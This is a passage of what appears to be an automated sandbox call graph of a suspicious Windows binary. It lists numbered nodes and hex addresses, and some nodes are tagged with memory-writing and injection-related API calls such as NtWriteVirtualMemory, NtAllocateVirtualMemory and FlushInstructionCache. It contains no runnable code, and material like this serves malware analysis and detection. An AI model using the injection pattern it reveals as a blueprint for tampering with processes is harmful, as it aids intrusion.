27994->27997 27996 2f389d0 4 API calls 27995->27996 27998 2f416bc 27996->27998 27999 2f40f00 27997->27999 28001 2f416dd 27998->28001 28000 2f40f39 27999->28000 28002 2f40f63 28000->28002 28004 2f4171f 28001->28004 28003 2f40f70 28002->28003 28006 2f389d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28003->28006 28005 2f389d0 4 API calls 28004->28005 28009 2f41738 28005->28009 28007 2f40f7c 28006->28007 28008 2f40f9d 28007->28008 28011 2f412f9 28007->28011 28012 2f40fbe 28008->28012 28010 2f41790 28009->28010 28013 2f4179b 28010->28013 28014 2f42b11 28011->28014 28018 2f40ff5 28012->28018 28015 2f417a8 28013->28015 28020 2f42b3b 28014->28020 28016 2f389d0 4 API calls 28015->28016 28017 2f417b4 28016->28017 28023 2f417c3 28017->28023 28019 2f4100d 28018->28019 28022 2f389d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28019->28022 28021 2f389d0 4 API calls 28020->28021 28026 2f42b54 28021->28026 28024 2f41019 28022->28024 28028 2f417fe 28023->28028 28025 2f4103a 28024->28025 28027 2f41045 28025->28027 28031 2f42b8d 28026->28031 28032 2f41071 28027->28032 28029 2f4182a 28028->28029 28030 2f41835 28029->28030 28033 2f41842 28030->28033 28034 2f42bc4 28031->28034 28035 2f41089 28032->28035 28036 2f389d0 4 API calls 28033->28036 28038 2f389d0 4 API calls 28034->28038 28039 2f389d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28035->28039 28037 2f4184e 28036->28037 28043 2f4187a 28037->28043 28042 2f42bd0 28038->28042 28040 2f41095 28039->28040 28041 2f410b6 28040->28041 28047 2f410c1 28041->28047 28046 2f42c09 28042->28046 28044 2f418a6 28043->28044 28045 2f418b1 28044->28045 28048 2f418be 28045->28048 28051 2f42c40 28046->28051 28049 2f41105 28047->28049 28050 2f389d0 4 API calls 28048->28050 28054 2f389d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28049->28054 28052 2f418ca 28050->28052 28053 2f389d0 4 API calls 28051->28053 28052->28011 28057 2f418dc 28052->28057 28058 2f42c4c 28053->28058 28055 2f41111 28054->28055 28056 2f24860 28055->28056 28062 2f41132 28056->28062 28059 2f418fd 28057->28059 28060 2f42c78 28058->28060 28066 2f41915 28059->28066 28061 2f42ca4 28060->28061 28064 2f42caf 28061->28064 28063 2f41174 28062->28063 28065 2f41181 28063->28065 28067 2f389d0 4 API calls 28064->28067 28068 2f389d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28065->28068 28071 2f389d0 4 API calls 28066->28071 28069 2f42cc8 28067->28069 28070 2f4118d 28068->28070 28069->27786 28075 2f42ced 28069->28075 28072 2f411ae 28070->28072 28073 2f41958 28071->28073 28076 2f411b9 28072->28076 28074 2f41979 28073->28074 28079 2f41991 28074->28079 28080 2f42d26 28075->28080 28077 2f411f0 28076->28077 28078 2f389d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28077->28078 28081 2f41209 28078->28081 28082 2f389d0 4 API calls 28079->28082 28083 2f389d0 4 API calls 28080->28083 28084 2f41213 28081->28084 28085 2f419d4 28082->28085 28086 2f42d69 28083->28086 28087 2f41220 28084->28087 28088 2f419de 28085->28088 28091 2f42da2 28086->28091 28089 2f4129e 28087->28089 28094 2f41a39 28088->28094 28090 2f412b6 28089->28090 28093 2f412d5 28090->28093 28092 2f389d0 4 API calls 28091->28092 28097 2f42de5 28092->28097 28095 2f412e0 28093->28095 28096 2f41a70 28094->28096 28099 2f389d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28095->28099 28098 2f389d0 4 API calls 28096->28098 28102 2f42e1e 28097->28102 28100 2f41a7c 28098->28100 28099->28011 28101 2f41a9d 28100->28101 28103 2f41ab5 28101->28103 28104 2f42e55 28102->28104 28106 2f41ad4 28103->28106 28105 2f389d0 4 API calls 28104->28105 28108 2f42e61 28105->28108 28107 2f41aec 28106->28107 28110 2f389d0 4 API calls 28107->28110 28109 2f42e8d 28108->28109 28113 2f42e9a 28109->28113 28111 2f41af8 28110->28111 28112 2f41b19 28111->28112 28115 2f41b31 28112->28115 28114 2f42ec4 28113->28114 28116 2f389d0 4 API calls 28114->28116 28118 2f41b50 28115->28118 28117 2f42edd 28116->28117 28120 2f42ee7 28117->28120 28119 2f389d0 4 API calls 28118->28119 28121 2f41b74 28119->28121 28124 2f42f09 28120->28124 28122 2f41b95 28121->28122 28123 2f41bad 28122->28123 28125 2f41bcc 28123->28125 28126 2f42f6c 28124->28126 28127 2f41be4 28125->28127 28128 2f389d0 4 API calls 28126->28128 28129 2f389d0 4 API calls 28127->28129 28131 2f42f85 28128->28131 28130 2f41bf0 28129->28130 28133 2f41c1c 28130->28133 28132 2f42fb1 28131->28132 28134 2f42fbe 28132->28134 28135 2f41c48 28133->28135 28136 2f42fdd 28134->28136 28137 2f41c53 28135->28137 28138 2f42fe8 28136->28138 28139 2f41c60 28137->28139 28140 2f42ff5 28138->28140 28142 2f389d0 4 API calls 28139->28142 28141 2f389d0 4 API calls 28140->28141 28147 2f43001 28141->28147 28143 2f41c6c 28142->28143 28144 2f41c97 28143->28144 28145 2f41cc3 28144->28145 28146 2f41cd0 28145->28146 28148 2f41cef 28146->28148 28149 2f4305a 28147->28149 28150 2f41cfa 28148->28150 28151 2f43091 28149->28151 28153 2f389d0 4 API calls 28150->28153 28152 2f389d0 4 API calls 28151->28152 28155 2f4309d 28152->28155 28154 2f41d13 28153->28154 28156 2f41d4c 28154->28156 28157 2f430d6 28155->28157 28158 2f41d76 28156->28158 28159 2f4310d 28157->28159 28161 2f389d0 4 API calls 28158->28161 28160 2f389d0 4 API calls 28159->28160 28164 2f43119 28160->28164 28162 2f41d8f 28161->28162 28163 2f41db0 28162->28163 28166 2f41dc8 28163->28166 28165 2f43152 28164->28165 28167 2f43171 28165->28167 28169 2f41df2 28166->28169 28168 2f4317c 28167->28168 28170 2f43189 28168->28170 28171 2f389d0 4 API calls 28169->28171 28172 2f389d0 4 API calls 28170->28172 28173 2f41e0b 28171->28173 28174 2f43195 28172->28174 28178 2f41e36 28173->28178 28175 2f431a6 28174->28175 28176 2f431bc 28175->28176 28177 2f431cf 28176->28177 28179 2f431f0 28177->28179 28181 2f41e6d 28178->28181 28180 2f431fb 28179->28180 28182 2f43208 28180->28182 28183 2f41e85 28181->28183 28185 2f43227 28182->28185 28184 2f389d0 4 API calls 28183->28184 28188 2f41e91 28184->28188 28186 2f43232 28185->28186 28187 2f4323f 28186->28187 28189 2f389d0 4 API calls 28187->28189 28191 2f41eca 28188->28191 28190 2f4324b 28189->28190 28196 2f4326c 28190->28196 28192 2f41ee9 28191->28192 28193 2f41ef4 28192->28193 28194 2f41f01 28193->28194 28195 2f389d0 4 API calls 28194->28195 28198 2f41f26 28194->28198 28195->28194 28197 2f389d0 4 API calls 28196->28197 28199 2f432c7 28197->28199 28200 2f41f52 28198->28200 28202 2f432e8 28199->28202 28201 2f41f7e 28200->28201 28203 2f41f89 28201->28203 28205 2f4331f 28202->28205 28204 2f389d0 4 API calls 28203->28204 28207 2f41fa2 28204->28207 28206 2f389d0 4 API calls 28205->28206 28208 2f43343 28206->28208 28209 2f41fce 28207->28209 28212 2f4337c 28208->28212 28210 2f41ffa 28209->28210 28211 2f42005 28210->28211 28213 2f389d0 4 API calls 28211->28213 28215 2f433b3 28212->28215 28409 2f4201e 28213->28409 28216 2f389d0 4 API calls 28215->28216 28217 2f433bf 28216->28217 28220 2f433dd 28217->28220 28218 2f42030 28219 2f4205c 28218->28219 28221 2f42088 28219->28221 28224 2f4340a 28220->28224 28222 2f42093 28221->28222 28223 2f389d0 4 API calls 28222->28223 28225 2f420ac 28223->28225 28230 2f43437 28224->28230 28226 2f420d8 28225->28226 28227 2f42104 28226->28227 28228 2f4210f 28227->28228 28229 2f389d0 4 API calls 28228->28229 28229->28409 28231 2f434b8 28230->28231 28232 2f389d0 4 API calls 28231->28232 28235 2f434d1 28232->28235 28233 2f4213f 28234 2f4216b 28233->28234 28239 2f42197 28234->28239 28237 2f43534 28235->28237 28236 2f389d0 4 API calls 28236->28239 28238 2f389d0 4 API calls 28237->28238 28241 2f4354d 28238->28241 28239->28236 28240 2f421e7 28239->28240 28246 2f42213 28240->28246 28242 2f43577 28241->28242 28277 2f436eb 28241->28277 28244 2f435a3 28242->28244 28243 2f389d0 4 API calls 28243->28246 28247 2f435da 28244->28247 28245 2f43739 28248 2f43770 28245->28248 28246->28243 28252 2f4225f 28246->28252 28249 2f389d0 4 API calls 28247->28249 28250 2f389d0 4 API calls 28248->28250 28256 2f435f3 28249->28256 28251 2f43789 28250->28251 28253 2f437aa 28251->28253 28255 2f422ae 28252->28255 28258 2f437e1 28253->28258 28254 2f389d0 4 API calls 28254->28255 28255->28254 28257 2f422e6 28255->28257 28260 2f43656 28256->28260 28259 2f422f3 28257->28259 28262 2f389d0 4 API calls 28258->28262 28263 2f42312 28259->28263 28261 2f389d0 4 API calls 28260->28261 28268 2f4366f 28261->28268 28264 2f43805 28262->28264 28265 2f4232a 28263->28265 28269 2f43859 28264->28269 28266 2f389d0 4 API calls 28265->28266 28267 2f42336 28266->28267 28270 2f42356 28267->28270 28272 2f436d2 28268->28272 28275 2f43890 28269->28275 28271 2f42377 28270->28271 28274 2f42382 28271->28274 28273 2f389d0 4 API calls 28272->28273 28273->28277 28278 2f423ae 28274->28278 28276 2f389d0 4 API calls 28275->28276 28279 2f438b4 28276->28279 28277->28245 28280 2f423b9 28278->28280 28283 2f438ed 28279->28283 28281 2f389d0 4 API calls 28280->28281 28282 2f423f3 28280->28282 28281->28280 28284 2f423fe 28282->28284 28285 2f43924 28283->28285 28287 2f4242a 28284->28287 28286 2f389d0 4 API calls 28285->28286 28288 2f43930 28286->28288 28289 2f42435 28287->28289 28291 2f4395c 28288->28291 28290 2f389d0 4 API calls 28289->28290 28292 2f4244e 28290->28292 28293 2f43993 28291->28293 28296 2f4249a 28292->28296 28294 2f389d0 4 API calls 28293->28294 28295 2f439ac 28294->28295 28299 2f439cd 28295->28299 28297 2f424c6 28296->28297 28298 2f424d1 28297->28298 28301 2f424de 28298->28301 28302 2f43a04 28299->28302 28300 2f389d0 4 API calls 28300->28301 28301->28300 28304 2f42516 28301->28304 28303 2f389d0 4 API calls 28302->28303 28311 2f43a28 28303->28311 28305 2f42542 28304->28305 28306 2f4254d 28305->28306 28308 2f4255a 28306->28308 28307 2f43a3d 28307->28311 28309 2f389d0 4 API calls 28308->28309 28310 2f42566 28309->28310 28314 2f4259b 28310->28314 28311->28307 28315 2f43aae 28311->28315 28381 2f43df3 28311->28381 28312 2f4555c 28313 2f45593 28312->28313 28316 2f389d0 4 API calls 28313->28316 28320 2f425d2 28314->28320 28318 2f43ae7 28315->28318 28317 2f455ac 28316->28317 28319 2f455cd 28317->28319 28321 2f43b1e 28318->28321 28325 2f45604 28319->28325 28323 2f425ea 28320->28323 28324 2f389d0 4 API calls 28321->28324 28322 2f389d0 4 API calls 28322->28323 28323->28322 28326 2f42617 28323->28326 28328 2f43b2a 28324->28328 28329 2f389d0 4 API calls 28325->28329 28327 2f42622 28326->28327 28332 2f4264e 28327->28332 28331 2f43b56 28328->28331 28330 2f45628 28329->28330 28339 2f45654 28330->28339 28333 2f43b8d 28331->28333 28336 2f42666 28332->28336 28335 2f389d0 4 API calls 28333->28335 28334 2f389d0 4 API calls 28334->28336 28337 2f43ba6 28335->28337 28336->28334 28338 2f42688 28336->28338 28342 2f43bc7 28337->28342 28343 2f4269b 28338->28343 28340 2f389d0 4 API calls 28339->28340 28341 2f456a4 28340->28341 28350 2f456d0 28341->28350 28344 2f43bfe 28342->28344 28346 2f426f3 28343->28346 28345 2f389d0 4 API calls 28344->28345 28349 2f43c22 28345->28349 29026 2f246d4 28346->29026 28355 2f43c5b 28349->28355 28351 2f389d0 4 API calls 28350->28351 28352 2f45720 28351->28352 28364 2f45746 28352->28364 28358 2f43c92 28355->28358 28359 2f389d0 4 API calls 28358->28359 28362 2f43c9e 28359->28362 28366 2f43cc7 28362->28366 28365 2f389d0 4 API calls 28364->28365 28375 2f457c2 28365->28375 28370 2f43d35 28366->28370 28372 2f43d6c 28370->28372 28374 2f389d0 4 API calls 28372->28374 28376 2f43d85 28374->28376 28377 2f389d0 4 API calls 28375->28377 28379 2f43dcb 28376->28379 28383 2f4583e 28377->28383 28379->28381 28380 2f42877 28380->28409 28381->27753 28381->28312 28382 2f389d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28382->28409 28385 2f389d0 4 API calls 28383->28385 28384 2f428b5 28386 2f4290d 28384->28386 28391 2f458e6 28385->28391 28387 2f246d4 28386->28387 28389 2f42925 28387->28389 28388 2f389d0 4 API calls 28388->28389 28389->28388 28390 2f4296a 28389->28390 28393 2f42989 28390->28393 28392 2f389d0 4 API calls 28391->28392 28398 2f45962 28392->28398 28394 2f42994 28393->28394 28395 2f429a1 28394->28395 28396 2f389d0 4 API calls 28395->28396 28397 2f429ad 28396->28397 28400 2f429ee 28397->28400 28399 2f389d0 4 API calls 28398->28399 28405 2f459de 28399->28405 28401 2f42a06 28400->28401 28402 2f42a25 28401->28402 28404 2f42a30 28402->28404 28403 2f389d0 4 API calls 28403->28404 28404->28403 28407 2f42a6a 28404->28407 28406 2f389d0 4 API calls 28405->28406 28410 2f45a5a 28406->28410 28408 2f4286c 28407->28408 28408->28380 28409->28011 28409->28173 28409->28218 28409->28233 28409->28382 28409->28384 29025 2f3e4b8 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28409->29025 28411 2f389d0 4 API calls 28410->28411 28412 2f45b07 28411->28412 28413 2f389d0 4 API calls 28412->28413 28414 2f45b83 28413->28414 28415 2f389d0 4 API calls 28414->28415 28416 2f45bff 28415->28416 28417 2f389d0 4 API calls 28416->28417 28418 2f45c7b 28417->28418 28419 2f389d0 4 API calls 28418->28419 28420 2f45cf7 28419->28420 28421 2f389d0 4 API calls 28420->28421 28422 2f45d73 28421->28422 28423 2f47568 28422->28423 28425 2f45dd3 28422->28425 28424 2f389d0 4 API calls 28423->28424 28427 2f475e4 28424->28427 28426 2f389d0 4 API calls 28425->28426 28429 2f45e4f 28426->28429 28428 2f389d0 4 API calls 28427->28428 28431 2f47660 28428->28431 28430 2f389d0 4 API calls 28429->28430 28433 2f45ecb 28430->28433 28432 2f389d0 4 API calls 28431->28432 28435 2f476dc 28432->28435 28434 2f389d0 4 API calls 28433->28434 28438 2f45f47 28434->28438 28436 2f389d0 4 API calls 28435->28436 28437 2f47758 28436->28437 28439 2f389d0 4 API calls 28437->28439 28440 2f389d0 4 API calls 28438->28440 28441 2f477d4 28439->28441 28442 2f45ffb 28440->28442 28444 2f48318 28441->28444 28445 2f477e9 28441->28445 28443 2f389d0 4 API calls 28442->28443 28448 2f46077 28443->28448 28446 2f389d0 4 API calls 28444->28446 28447 2f389d0 4 API calls 28445->28447 28451 2f48394 28446->28451 28450 2f47865 28447->28450 28449 2f389d0 4 API calls 28448->28449 28454 2f460f3 28449->28454 28452 2f389d0 4 API calls 28450->28452 28453 2f389d0 4 API calls 28451->28453 28456 2f478e1 28452->28456 28457 2f48410 28453->28457 28455 2f389d0 4 API calls 28454->28455 28465 2f4616f 28455->28465 28458 2f389d0 4 API calls 28456->28458 28459 2f389d0 4 API calls 28457->28459 28460 2f4795d 28458->28460 28462 2f4848c 28459->28462 29029 2f385bc GetModuleHandleA GetProcAddress 28460->29029 28463 2f389d0 4 API calls 28462->28463 28464 2f48508 28463->28464 28467 2f4851d 28464->28467 28472 2f493a1 28464->28472 28466 2f389d0 4 API calls 28465->28466 28474 2f4623c 28466->28474 28470 2f4853e 28467->28470 28468 2f47986 28469 2f389d0 4 API calls 28468->28469 28477 2f47a02 28469->28477 28471 2f48575 28470->28471 28475 2f389d0 4 API calls 28471->28475 28473 2f389d0 4 API calls 28472->28473 28482 2f4941d 28473->28482 28476 2f389d0 4 API calls 28474->28476 28479 2f48599 28475->28479 28483 2f462b8 28476->28483 28478 2f389d0 4 API calls 28477->28478 28488 2f47a7e 28478->28488 28480 2f485d2 28479->28480 28481 2f48609 28480->28481 28484 2f389d0 4 API calls 28481->28484 28485 2f389d0 4 API calls 28482->28485 28486 2f389d0 4 API calls 28483->28486 28487 2f48615 28484->28487 28492 2f49499 28485->28492 28493 2f46334 28486->28493 28490 2f48641 28487->28490 28489 2f389d0 4 API calls 28488->28489 28499 2f47afa 28489->28499 28491 2f48678 28490->28491 28494 2f389d0 4 API calls 28491->28494 28495 2f389d0 4 API calls 28492->28495 28496 2f389d0 4 API calls 28493->28496 28497 2f48691 28494->28497 28510 2f49515 28495->28510 28503 2f463b0 28496->28503 28498 2f486bd 28497->28498 28501 2f486e0 28498->28501 28500 2f389d0 4 API calls 28499->28500 28512 2f47b9d 28500->28512 28502 2f4876e 28501->28502 28505 2f486f2 28501->28505 28507 2f4878f 28502->28507 28504 2f389d0 4 API calls 28503->28504 28518 2f4642c 28504->28518 28509 2f4871e 28505->28509 28506 2f49cf5 28508 2f389d0 4 API calls 28506->28508 28515 2f487a7 28507->28515 28521 2f49d71 28508->28521 28513 2f48755 28509->28513 28510->28506 28511 2f389d0 4 API calls 28510->28511 28524 2f495bb 28511->28524 28514 2f389d0 4 API calls 28512->28514 28516 2f389d0 4 API calls 28513->28516 28527 2f47c19 28514->28527 28517 2f389d0 4 API calls 28515->28517 28516->28502 28519 2f487ea 28517->28519 28520 2f389d0 4 API calls 28518->28520 28529 2f48823 28519->28529 28523 2f464a8 28520->28523 28522 2f389d0 4 API calls 28521->28522 28532 2f49ded 28522->28532 29028 2f385bc GetModuleHandleA GetProcAddress 28523->29028 28525 2f389d0 4 API calls 28524->28525 28534 2f49637 28525->28534 28528 2f389d0 4 API calls 28527->28528 28539 2f47c95 28528->28539 28530 2f389d0 4 API calls 28529->28530 28531 2f48866 28530->28531 28543 2f488b9 28531->28543 28533 2f389d0 4 API calls 28532->28533 28538 2f49e69 28533->28538 28536 2f389d0 4 API calls 28534->28536 28535 2f464e6 28537 2f389d0 4 API calls 28535->28537 28554 2f496b3 28536->28554 28548 2f46562 28537->28548 28540 2f389d0 4 API calls 28538->28540 28541 2f389d0 4 API calls 28539->28541 28542 2f49e9c 28540->28542 28551 2f47d30 28541->28551 28544 2f389d0 4 API calls 28542->28544 28545 2f389d0 4 API calls 28543->28545 28547 2f49ecf 28544->28547 28546 2f48914 28545->28546 28556 2f48935 28546->28556 28550 2f389d0 4 API calls 28547->28550 28549 2f389d0 4 API calls 28548->28549 28559 2f465de 28549->28559 28552 2f49f02 28550->28552 28553 2f389d0 4 API calls 28551->28553 28555 2f389d0 4 API calls 28552->28555 28561 2f47dac 28553->28561 28557 2f389d0 4 API calls 28554->28557 28563 2f49f35 28555->28563 28558 2f389d0 4 API calls 28556->28558 28565 2f4978a 28557->28565 28567 2f48990 28558->28567 28560 2f389d0 4 API calls 28559->28560 28571 2f4665a 28560->28571 28562 2f389d0 4 API calls 28561->28562 28578 2f47e28 28562->28578 28564 2f389d0 4 API calls 28563->28564 28573 2f49fb1 28564->28573 28566 2f389d0 4 API calls 28565->28566 28575 2f49806 28566->28575 28568 2f389d0 4 API calls 28567->28568 28569 2f48a0c 28568->28569 29032 2f3d164 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28569->29032 28572 2f389d0 4 API calls 28571->28572 28582 2f466d6 28572->28582 28574 2f389d0 4 API calls 28573->28574 28588 2f4a02d 28574->28588 28576 2f389d0 4 API calls 28575->28576 28646 2f49aa9 28575->28646 28591 2f49894 28576->28591 28577 2f389d0 4 API calls 28590 2f49b6b 28577->28590 28580 2f389d0 4 API calls 28578->28580 28579 2f48a20 28581 2f389d0 4 API calls 28579->28581 28584 2f47ee5 28580->28584 28594 2f48aa1 28581->28594 28583 2f468db 28582->28583 28585 2f389d0 4 API calls 28582->28585 28586 2f389d0 4 API calls 28583->28586 29030 2f37e50 GetModuleHandleA GetProcAddress 28584->29030 28598 2f46767 28585->28598 28599 2f469c5 28586->28599 28589 2f389d0 4 API calls 28588->28589 28593 2f4a0a9 28589->28593 28592 2f389d0 4 API calls 28590->28592 28595 2f389d0 4 API calls 28591->28595 28608 2f49be7 28592->28608 28597 2f389d0 4 API calls 28593->28597 28596 2f389d0 4 API calls 28594->28596 28607 2f49910 28595->28607 28609 2f48b1d 28596->28609 28600 2f4a0dc 28597->28600 28602 2f389d0 4 API calls 28598->28602 28603 2f389d0 4 API calls 28599->28603 28605 2f389d0 4 API calls 28600->28605 28601 2f47f08 28604 2f389d0 4 API calls 28601->28604 28620 2f467e3 28602->28620 28617 2f46a41 28603->28617 28619 2f47f84 28604->28619 28606 2f4a10f 28605->28606 28612 2f389d0 4 API calls 28606->28612 28610 2f389d0 4 API calls 28607->28610 28611 2f389d0 4 API calls 28608->28611 28613 2f389d0 4 API calls 28609->28613 28631 2f4998c 28610->28631 28626 2f49c63 28611->28626 28615 2f4a142 28612->28615 28614 2f48b99 28613->28614 28628 2f48bb9 28614->28628 29033 2f38730 GetModuleHandleA GetProcAddress 28614->29033 28618 2f389d0 4 API calls 28615->28618 28622 2f389d0 4 API calls 28617->28622 28624 2f4a175 28618->28624 28623 2f389d0 4 API calls 28619->28623 28621 2f389d0 4 API calls 28620->28621 28636 2f4685f 28621->28636 28634 2f46abd 28622->28634 28635 2f48000 28623->28635 28625 2f389d0 4 API calls 28624->28625 28640 2f4a1a8 28625->28640 28627 2f389d0 4 API calls 28626->28627 28629 2f49cdf 28627->28629 28630 2f389d0 4 API calls 28628->28630 28869 2f38d70 28629->28869 28642 2f48c35 28630->28642 28633 2f389d0 4 API calls 28631->28633 28644 2f49a2d 28633->28644 28637 2f389d0 4 API calls 28634->28637 28638 2f389d0 4 API calls 28635->28638 28639 2f389d0 4 API calls 28636->28639 28648 2f46b39 28637->28648 28647 2f4807c 28638->28647 28639->28583 28641 2f389d0 4 API calls 28640->28641 28654 2f4a224 28641->28654 28643 2f389d0 4 API calls 28642->28643 28656 2f48cb1 28643->28656 28645 2f389d0 4 API calls 28644->28645 28645->28646 28646->28577 28650 2f389d0 4 API calls 28647->28650 28649 2f389d0 4 API calls 28648->28649 28660 2f46bb5 28649->28660 28651 2f480f8 28650->28651 29031 2f3b118 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28651->29031 28653 2f48109 28653->27753 28655 2f389d0 4 API calls 28654->28655 28658 2f4a2a0 28655->28658 28657 2f389d0 4 API calls 28656->28657 28662 2f48d2d 28657->28662 28659 2f389d0 4 API calls 28658->28659 28663 2f4a2d3 28659->28663 28661 2f389d0 4 API calls 28660->28661 28666 2f46c31 28661->28666 28664 2f389d0 4 API calls 28662->28664 28665 2f389d0 4 API calls 28663->28665 28668 2f48db4 28664->28668 28669 2f4a34f 28665->28669 28667 2f389d0 4 API calls 28666->28667 28672 2f46cad 28667->28672 28670 2f389d0 4 API calls 28668->28670 28671 2f389d0 4 API calls 28669->28671 28674 2f48e30 28670->28674 28675 2f4a3cb 28671->28675 28673 2f389d0 4 API calls 28672->28673 28684 2f46d48 28673->28684 28676 2f389d0 4 API calls 28674->28676 28677 2f389d0 4 API calls 28675->28677 28682 2f48eac 28676->28682 28678 2f4a447 28677->28678 28679 2f389d0 4 API calls 28678->28679 28680 2f4a47a 28679->28680 28681 2f389d0 4 API calls 28680->28681 28685 2f4a4ad 28681->28685 28683 2f389d0 4 API calls 28682->28683 28690 2f48f33 28683->28690 28687 2f389d0 4 API calls 28684->28687 28686 2f389d0 4 API calls 28685->28686 28688 2f4a4e0 28686->28688 28692 2f46e43 28687->28692 28689 2f389d0 4 API calls 28688->28689 28694 2f4a513 28689->28694 28691 2f389d0 4 API calls 28690->28691 28696 2f48faf 28691->28696 28693 2f389d0 4 API calls 28692->28693 28700 2f46ebf 28693->28700 28695 2f389d0 4 API calls 28694->28695 28698 2f4a58f 28695->28698 28697 2f389d0 4 API calls 28696->28697 28703 2f4902b 28697->28703 28699 2f389d0 4 API calls 28698->28699 28702 2f4a60b 28699->28702 28701 2f389d0 4 API calls 28700->28701 28708 2f46f77 28701->28708 28704 2f389d0 4 API calls 28702->28704 28705 2f389d0 4 API calls 28703->28705 28706 2f4a63e 28704->28706 28712 2f490a7 28705->28712 28707 2f389d0 4 API calls 28706->28707 28709 2f4a671 28707->28709 28710 2f389d0 4 API calls 28708->28710 28711 2f389d0 4 API calls 28709->28711 28716 2f46ff3 28710->28716 28714 2f4a6a4 28711->28714 28713 2f389d0 4 API calls 28712->28713 28719 2f49123 28713->28719 28715 2f389d0 4 API calls 28714->28715 28717 2f4a6d7 28715->28717 28716->27753 28718 2f389d0 4 API calls 28717->28718 28721 2f4a70a 28718->28721 28720 2f389d0 4 API calls 28719->28720 28723 2f4919f 28720->28723 28722 2f389d0 4 API calls 28721->28722 28731 2f4a786 28722->28731 28724 2f389d0 4 API calls 28723->28724 28725 2f4921b 28724->28725 29034 2f3894c 28725->29034 28727 2f4923a 28728 2f3894c 3 API calls 28727->28728 28729 2f4924e 28728->28729 28730 2f3894c 3 API calls 28729->28730 28732 2f49262 28730->28732 28734 2f389d0 4 API calls 28731->28734 28733 2f3894c 3 API calls 28732->28733 28735 2f49276 28733->28735 28739 2f4a802 28734->28739 28736 2f3894c 3 API calls 28735->28736 28737 2f4928a 28736->28737 28738 2f3894c 3 API calls 28737->28738 28741 2f4929e 28738->28741 28740 2f389d0 4 API calls 28739->28740 28743 2f4a87e 28740->28743 28742 2f389d0 4 API calls 28741->28742 28745 2f49325 28742->28745 28744 2f389d0 4 API calls 28743->28744 28747 2f4a8fa 28744->28747 28746 2f389d0 4 API calls 28745->28746 28746->28472 28748 2f389d0 4 API calls 28747->28748 28749 2f4a976 28748->28749 28750 2f389d0 4 API calls 28749->28750 28751 2f4a985 28750->28751 28752 2f389d0 4 API calls 28751->28752 28753 2f4a994 28752->28753 28754 2f389d0 4 API calls 28753->28754 28755 2f4a9a3 28754->28755 28756 2f389d0 4 API calls 28755->28756 28757 2f4a9b2 28756->28757 28758 2f389d0 4 API calls 28757->28758 28759 2f4a9c1 28758->28759 28760 2f389d0 4 API calls 28759->28760 28761 2f4a9d0 28760->28761 28762 2f389d0 4 API calls 28761->28762 28763 2f4a9df 28762->28763 28764 2f389d0 4 API calls 28763->28764 28765 2f4a9ee 28764->28765 28766 2f389d0 4 API calls 28765->28766 28767 2f4a9fd 28766->28767 28768 2f389d0 4 API calls 28767->28768 28769 2f4aa0c 28768->28769 28770 2f389d0 4 API calls 28769->28770 28771 2f4aa1b 28770->28771 28772 2f389d0 4 API calls 28771->28772 28773 2f4aa2a 28772->28773 28774 2f389d0 4 API calls 28773->28774 28775 2f4aa39 28774->28775 28776 2f389d0 4 API calls 28775->28776 28777 2f4aa48 28776->28777 28778 2f389d0 4 API calls 28777->28778 28779 2f4aa57 28778->28779 28780 2f389d0 4 API calls 28779->28780 28781 2f4aad3 28780->28781 28782 2f389d0 4 API calls 28781->28782 28783 2f4ab06 28782->28783 28784 2f389d0 4 API calls 28783->28784 28785 2f4ab39 28784->28785 28786 2f389d0 4 API calls 28785->28786 28787 2f4ab6c 28786->28787 28788 2f389d0 4 API calls 28787->28788 28789 2f4ab9f 28788->28789 28790 2f389d0 4 API calls 28789->28790 28791 2f4abd2 28790->28791 28792 2f389d0 4 API calls 28791->28792 28793 2f4ac05 28792->28793 28794 2f389d0 4 API calls 28793->28794 28795 2f4ac38 28794->28795 28796 2f389d0 4 API calls 28795->28796 28797 2f4acb4 28796->28797 28798 2f389d0 4 API calls 28797->28798 28799 2f4ad30 28798->28799 28800 2f389d0 4 API calls 28799->28800 28801 2f4adac 28800->28801 28802 2f389d0 4 API calls 28801->28802 28803 2f4addf 28802->28803 28804 2f389d0 4 API calls 28803->28804 28805 2f4ae12 28804->28805 28806 2f389d0 4 API calls 28805->28806 28807 2f4ae45 28806->28807 28808 2f389d0 4 API calls 28807->28808 28809 2f4ae78 28808->28809 28810 2f389d0 4 API calls 28809->28810 28811 2f4aeab 28810->28811 28812 2f389d0 4 API calls 28811->28812 28813 2f4aede 28812->28813 28814 2f389d0 4 API calls 28813->28814 28815 2f4af11 28814->28815 28816 2f389d0 4 API calls 28815->28816 28817 2f4af44 28816->28817 28818 2f389d0 4 API calls 28817->28818 28819 2f4af77 28818->28819 28820 2f389d0 4 API calls 28819->28820 28821 2f4afaa 28820->28821 28822 2f389d0 4 API calls 28821->28822 28823 2f4afdd 28822->28823 28824 2f389d0 4 API calls 28823->28824 28825 2f4b010 28824->28825 28826 2f389d0 4 API calls 28825->28826 28827 2f4b043 28826->28827 28828 2f389d0 4 API calls 28827->28828 28829 2f4b076 28828->28829 28830 2f389d0 4 API calls 28829->28830 28831 2f4b0a9 28830->28831 28832 2f389d0 4 API calls 28831->28832 28833 2f4b0dc 28832->28833 28834 2f389d0 4 API calls 28833->28834 28835 2f4b10f 28834->28835 28836 2f389d0 4 API calls 28835->28836 28837 2f4b142 28836->28837 28838 2f389d0 4 API calls 28837->28838 28839 2f4b175 28838->28839 29038 2f38338 28839->29038 28841 2f4b184 28842 2f389d0 4 API calls 28841->28842 28843 2f4b200 28842->28843 28844 2f389d0 4 API calls 28843->28844 28845 2f4b27c 28844->28845 28846 2f389d0 4 API calls 28845->28846 28846->27786 28848 2f388c6 28847->28848 29045 2f38274 28848->29045 28850 2f388f1 29049 2f37d78 28850->29049 28852 2f3891f 28852->27757 28854 2f389e4 28853->28854 28855 2f381cc 2 API calls 28854->28855 28856 2f38a1d 